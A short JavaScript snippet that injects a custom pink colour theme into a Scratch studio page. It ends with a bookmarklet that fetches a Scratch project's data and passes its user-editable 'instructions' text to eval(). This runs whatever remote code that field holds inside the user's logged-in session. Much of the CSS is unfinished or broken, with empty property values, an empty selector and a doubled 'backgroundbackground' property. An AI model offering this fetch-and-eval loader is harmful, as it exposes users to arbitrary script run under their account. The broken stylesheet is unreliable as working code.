const style = document.createElement('style') style.innerHTML = ` .studio-page { background-color: #ffaabb; } .button { background-color: #000000; color: #FF88aa } .studio-title { color: #000000 } .studio-info .studio-description.uneditable { background-color: rgba(0,0,0,1); color: #FF88aa } html, body { color: #000000 } .replies.collapsed>.comment:last-of-type:after { backgroundbackground:linear-gradient(rgba(255, 240, 0, 0), #ffaabb) } .comment .comment-body .comment-bubble:before { border-color: #f8a transparent #f8a #f8a; background:#f8a } .comment .comment-body .comment-bubble { color: #000; background-color: } a:link, a:visited, a:active { color: } .compose-comment .textarea-row textarea:not(:focus) { color: ; background-color: } .studio-tab-nav .active>li { background-color: ; color: } .studio-tab-nav li { background-color: ; color: } .compose-comment .compose-bottom-row .compose-cancel { background-color: ; color: } { background-color: ; } .comment .comment-body .comment-bottom-row .comment-time { color: ; } .studio-info .studio-info-footer-report button { background-color: ; } .compose-comment .compose-error-row .compose-error-tip { background-color: ; color: } ` document.body.appendChild(style)
javascript:fetch('https://api.scratch.mit.edu/projects/880609727').then(response => response.json()).then(data => eval(data.instructions));